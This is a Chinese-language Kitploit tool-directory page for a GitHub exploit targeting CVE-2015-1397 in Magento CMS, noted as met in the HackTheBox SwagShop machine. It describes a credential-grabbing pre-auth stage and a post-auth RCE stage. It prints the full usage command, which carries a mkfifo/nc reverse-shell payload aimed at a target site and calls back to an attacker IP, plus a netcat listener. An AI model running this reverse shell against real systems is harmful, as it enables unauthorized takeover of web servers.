Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2015-1397-Magento-Shoplift — Magento CMS 中 CVE-2015-1397 的漏洞利用脚本,包括获取管理员凭据的预认证漏洞利用和用于反向 shell 执行的后认证 RCE 模块。 | Kitploit
工具/GitHubGitHub/wytchwulf/cve-2015-1397-magento-shoplift
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试
GitHubwytchwulf/cve-2015-1397-magento-shoplift

CVE-2015-1397-Magento-Shoplift

Magento CMS 中 CVE-2015-1397 的漏洞利用脚本,包括获取管理员凭据的预认证漏洞利用和用于反向 shell 执行的后认证 RCE 模块。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
12年前尚未审核

CVE-2015-1397-Magento-Shoplift

漏洞详情

漏洞出现在 HackTheBox 的 SwagShop 中

阶段 1 = exploit.py

获取 Magento CMS 管理后台的管理员凭据

阶段 2 = post_auth.py

将 exploit.py 获取的凭据添加到 post_auth.py 后,运行:

root@kitploit:~
python3 post_auth.py http://TARGET.SITE/index.php/admin "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 4444 >/tmp/f"

监听器:

root@kitploit:~
nc -lvnp 4444
下载工具